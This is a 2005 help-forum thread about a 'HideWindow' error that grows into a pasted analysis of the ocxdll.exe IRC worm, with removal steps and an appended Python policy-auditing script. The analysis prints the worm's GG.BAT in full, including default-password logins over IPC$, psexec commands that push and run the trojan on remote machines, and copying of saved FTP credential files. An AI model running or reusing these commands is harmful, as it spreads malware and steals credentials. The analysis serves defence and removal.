Hidewindow - Error (File Not Found!) 

I do not know how I got it or what it is and apparently no one else does, either!
It started when I went to Explorer or any applications like it! A small
square little error screen that says "HideWindow - Error", the message is
"File Not Found!". When I hit "OK", my system has a heart attack for a few
minutes, it makes it almost impossible to work! I used to run McAfee but switched
to Norton and it must have got by it! I researched it and got the info that
it was IRC Trojan but it can not be because I have the removal tool for that
and it does not work. I was running Norton and the only help they gave me
was to upgrade to Norton 2003 Professional, which I did and still nothing.
You know I hate these big internet companies, they sell you software that
does not work, the only answer they have is upgrade and if you need to talk
to someone they charge you $35.00 a shot. I could not get away with doing
business like that! Anyway, does someone out there have an idea? I am
getting desperate!
RB


Tue, 29 Mar 2005 06:56:07 GMT  
 Hidewindow - Error (File Not Found!)
Go to www.moosoft.com and download The Cleaner.  Run it and see if it finds anything on
your system.

Go to start Run type msconfig and go to the startup tab
See what is in there




Tue, 29 Mar 2005 19:47:28 GMT  
 Hidewindow - Error (File Not Found!)
Layla is one of my all time favorite songs. It had a special meaning to me
during a very stuff time!
Anyway, I followed your instructions and I was not successful! I am running
Windows 2000 Professional.
1. After running Cleaner, I got the following:
FILE: C:\PAGEFILE.SYS
PROBLEM: I could not scan this file.  Error Code 5: "Access is denied."
SOLUTION: A common reason for this error is that Windows has locked the file for
SOLUTION: exclusive access.  A swap file is a common example.  Also, an antivirus
SOLUTION: program might be denying access to the file.  In that case, you can
SOLUTION: temporarily disable the anti-virus to clean the trojan.
    I disabled Norton and got the results!
2. When I tried to use "msconfig", I get the message that it or one of its
components can not be found or incorrect path!
Anything else?
RB



Tue, 29 Mar 2005 21:33:14 GMT  
 Hidewindow - Error (File Not Found!)
Layla is one of my favorites as well.....

Found this information in a discussion group in newbies.org resulting from questions on
Hidewindow-errors

Read the following and see if any of this pertains to your situation

++
This is a trojan using SMB over TCP attack, using port 445. It looked for vulnerability
in weak administrator id and passwords on the local Windows 2000 systems.
++

One of my clients also got infected with ocxdll.exe virus. This occurred back in
8/28/2002 at 3am. After some detailed analysis, I have determined that it was a Trojan,
deleted the detected registry entries, deleted the infected files, tightened the
administrator ID and password, restored the security policy by running "secedit.exe
/configure" (from Microsoft) (if they have a backup .sdb file, then just reapplying the
security policy would fix this part), and added users back to local. The cause is bad
security (admin ID and passwords), and a backdoor to drop the ocxdll.exe.

Affected systems:
++
- Windows 2000. Security policies alteration was ONLY for Windows 2000
- Windows NT - might be infected, but will not distribute or change security policies.

What did it do?
++
1. hide all programs it ran.
2. open backdoor, port 60609
3. Run mIRC client with random usernames listed in mdm.scr with more random characters
4. It ran the bot (robot) scripts in the following order, which means they contained
malicious automated instructions.

[rfiles]
n0=nt32.ini
n1=dll16.ini
n2=nt32.ini
n3=dll32nt.hlp
n4=xvpll.hlp
n5=dll32.hlp
n6=httpsearch.ini.

5. Replace security policy settings using Microsoft security editor (SecEdit.exe
/configure) command and reset the security policy to default settings, and replace
security settings in the TFTP8675. This is done in quiet mode.
6. It scans for 20 IPs and then starts running "GG.BAT", which is the real program that
started the hacking.
7. It tries to hack into the system using the following user ID and password. If you
don't have these user id and passwords, maybe you are just infected with 1 system, and
it could not spread via this Trojan/worm.
a. "administrator" with NO password
b. "administrator" with "administrator" password
c. "root" with "root" password
d. "admin" with "admin" password
8. If you have some guessable administrator id and passwords, then probably these
systems were hacked successfully. It copied the Trojan OCXDLL.EXE to the compromised
systems. If file were there, copy it anyway, and do it quietly. (using
psexec.exe -c -f -d)
9. Run the OCXDLL.EXE without any delay (psexec.exe -d), which extracted the 17 files
that are in this self-extracted file.
10. It tries to copy "c:\progra~1\flashfxp\sites.dat" and
"c:\progra~1\ws_ftp\ws_ftp.ini" to "c:\windows\system32" directory. (maybe get the
configuration from the bot?)
11. Start the "taskmngr.exe" which was really a Mirc.EXE, an irc client.
12. The scripts were kicked in to HIDE the mirc window, so you can ONLY see it in the
process. You will see "taskmngr.exe" (NOT taskmgr.exe, which is the REAL task manager)
13. xvpll.hlp reports Trojan status back to the hacker. Either attempt failed or
attempt successful.
++
Disclaimer: The irc bot scripts have not been fully analyzed. This is what I understood
so far. The removal instructions WILL remove the trojan.
++

Impact:
++
This may be a random attack. However, there is a file, ncp.exe involved, which is the
NetCat program. This program allows the hackers to gain full control to your system.
Therefore,
1. Best-case scenario is that it was a hack, and no sensitive data were lost.
2. Worst-case scenario is that they have controlled your system and implemented
something new that is not yet detected.
3. The hacker has captured your IP address and knows that you were vulnerable because
the Trojan actually reported back to him/her.
++

How to remove the Trojan:
++
1. Delete files that were extracted from ocxdll.exe, plus ocxdll.exe and dll16.ini
(created when running mirc.exe)

Ocxdll.exe
Dll16.ini
dll32.hlp
dll32NT.hlp
gates.txt
gg.bat (bat file to hack and copy Trojans)
httpsearch.ini (might show up as httpsear.ini due to 8.3 file format)
kill.exe (to kill process)
mdm.exe (to hide window program)
mdm.scr
mt.exe
ncp.exe
NT32.ini
psexec.exe
seced.bat
taskmngr.exe
tftp8675
v.exe
xvpll.hlp

**
**NOTE:
seced.bat is a decoy. This file was never used. The real instruction for updating the
configuration was mentioned in item #5.
v.exe is actually srvany.exe, which is another decoy. It was never used.

**

2. Hkey local machine\Software\Microsoft\Windows\CurrentVersion\Run, remove
"taskmngr.exe" (this starts mirc client program during the windows startup)
3. Change the LOCAL Administrator password on ALL Systems! Make sure they are strong
passwords! Use mix of Uppercase, Lowercase, numbers, and non-alphanumeric, i.e.
_,+,=,), ...
4. If possible, change Administrator login ID to a different user_id. This will stop
the initial user_id guessing. (This will not stop the more sophisticated hackers)
5. Restore the default security policy settings by typing "secedit /configure
C:\WINNT\security\Database\secedit.sdb"
6. Go to Start -> Programs -> Administrative Tools -> Local Security Policy, click on
"User Rights Assignments", and add users and groups back into the policy. "Access this
computer from the network". The default setting is:
a. IWAM_[SYSTEM_NAME]
b. ADMINISTRATORS
c. BACKUP OPERATORS
d. POWER USERS
e. USERS
f. EVERYONE
g. IUSR_[SYSTEM_NAME]

Additional Recommendation:
--
1. Tighten your Firewall and ANY all unwanted traffic from accessing ports, BOTH inside
to outside, and outside to inside.
2. Rename your administrator user id to something else, and create a user id called
"Administrator" with NO GROUPS. This will allow you to monitor anyone trying to use the
"Administrator" login.
3. Set up security log, at minimum, log successful and failed Logon/Logoff, and monitor
the event logs.
++

More details:
Infection:
registry entries
- Hkey local machine\Software\Microsoft\Windows\CurrentVersion\Run, remove
"taskmngr.exe" (this starts mirc client program during the windows startup)

When MIRC client started running, it runs the scripts in dll32nt.hlp, which in fact ran
"secedit /configure /DB secedit.sdb /cfg $mircdir $+ tftp8675 /quiet". This meant
"configure your system setting with the default security policy, plus the additional
settings in tftp8675". It basically removed many security restrictions, remove all
audits for the systems, and of course remove all users in the "Local Users allowed from
the net".
List from TFTP8675:
--
MinimumPasswordAge = 0
MaximumPasswordAge = 42
MinimumPasswordLength = 0
PasswordComplexity = 0
PasswordHistorySize = 0
LockoutBadCount = 0
RequireLogonToChangePassword = 0
ClearTextPassword = 0
[Event Audit]
AuditSystemEvents = 0
AuditLogonEvents = 0
AuditObjectAccess = 0
AuditPrivilegeUse = 0
AuditPolicyChange = 0
AuditAccountManage = 0
AuditProcessTracking = 0
AuditDSAccess = 0
AuditAccountLogon = 0
--

OCXDLL.EXE is a self-extracted file that included 17 files. It is a Trojan and it's a
worm. In the dll32nt.hlp, it has an instruction to do IP scan, and store the 20 IP
addresses it found. Most likely it scanned the subnet and file server that were
connected to the victim systems at that time. Then it has an instruction at the end to
run GG.BAT, which is the instruction to attack the 20 IPs that it just found.

Here are the files that were extracted from ocxdll.exe:
++
ocxdll.exe
dll32.hlp
dll32NT.hlp
gates.txt
gg.bat
httpsearch.ini
kill.exe
mdm.exe
mdm.scr
mt.exe
ncp.exe
NT32.ini
psexec.exe
seced.bat
taskmngr.exe
tftp8675
v.exe
xvpll.hlp
++

Here is the GG.BAT text:

net use /del \\%1\ipc$
net use \\%1\ipc$ "" /user:administrator
net use \\%1\ipc$ "administrator" /user:administrator
net use \\%1\ipc$ "root" /user:root
net use \\%1\ipc$ "admin" /user:admin
psexec \\%1 attrib.exe -r ocxdll.exe
psexec \\%1 -d kill.exe temp.exe
psexec \\%1 -f -c -d ocxdll.exe -o
psexec \\%1 -d ocxdll.exe -o
psexec \\%1 cmd.exe /c copy c:\progra~1\flashfxp\sites.dat c:\winnt\system32\w%1.dat
psexec \\%1 -d taskmngr.exe
psexec \\%1 cmd.exe /c copy c:\progra~1\ws_ftp\ws_ftp.ini c:\winnt\system32\w%1.ini
psexec \\%1 -d taskmngr.exe
--

--
from SysInternals, here is the description of what the PSEXEC parameters do:
-c = Copy the specified program to the remote system for execution. If you omit this
option then the application must be in the system's path on the remote system.
-f = Copy the specified program to the remote system even if the file already exists on
the remote system.
-d = Don't wait for application to terminate. Only use this option for non-interactive
applications.
--


Wed, 30 Mar 2005 03:15:18 GMT  
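
The tftp8675 settings listed in the post above can be looked for in a policy exported with "secedit /export /cfg". The following is an added example, not part of the thread or of any tool named in it: it parses such a template and reports the weakened password, audit and network-logon settings. The sample text is constructed, and the [System Access] and [Privilege Rights] headers and the empty SeNetworkLogonRight line are assumptions about the export layout, since the post shows only key names.

```python
import configparser

# Password settings the post lists from the trojan's tftp8675 template.
WEAK_PASSWORD_KEYS = ("MinimumPasswordLength", "PasswordComplexity",
                      "PasswordHistorySize", "LockoutBadCount")

# Constructed sample; section headers are assumed, keys are from the post.
SAMPLE = """\
[System Access]
MinimumPasswordLength = 0
PasswordComplexity = 0
PasswordHistorySize = 0
LockoutBadCount = 0
[Event Audit]
AuditSystemEvents = 0
AuditLogonEvents = 0
AuditAccountLogon = 0
[Privilege Rights]
SeNetworkLogonRight =
"""

def audit_policy(inf_text):
    """Return findings for a security template passed in as decoded text."""
    cp = configparser.ConfigParser(delimiters=("=",), interpolation=None,
                                   strict=False)
    cp.optionxform = str                      # keep key names as written
    cp.read_string(inf_text)
    findings = []
    access = cp["System Access"] if cp.has_section("System Access") else {}
    for key in WEAK_PASSWORD_KEYS:
        if access.get(key, "").strip() == "0":
            findings.append(f"password policy disabled: {key} = 0")
    if cp.has_section("Event Audit"):
        audit = dict(cp["Event Audit"])
        off = sorted(k for k, v in audit.items() if v.strip() == "0")
        if audit and len(off) == len(audit):
            findings.append(f"all {len(off)} audit categories off")
        else:
            findings += [f"audit off: {k}" for k in off]
    # Assumed form of the emptied "Access this computer from the network" right.
    rights = cp["Privilege Rights"] if cp.has_section("Privilege Rights") else {}
    if "SeNetworkLogonRight" in rights and not rights["SeNetworkLogonRight"].strip():
        findings.append("SeNetworkLogonRight has no accounts")
    return findings

if __name__ == "__main__":
    for line in audit_policy(SAMPLE):
        print(line)
```

A real export is typically UTF-16 encoded, so decode the file before passing its text to audit_policy.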
 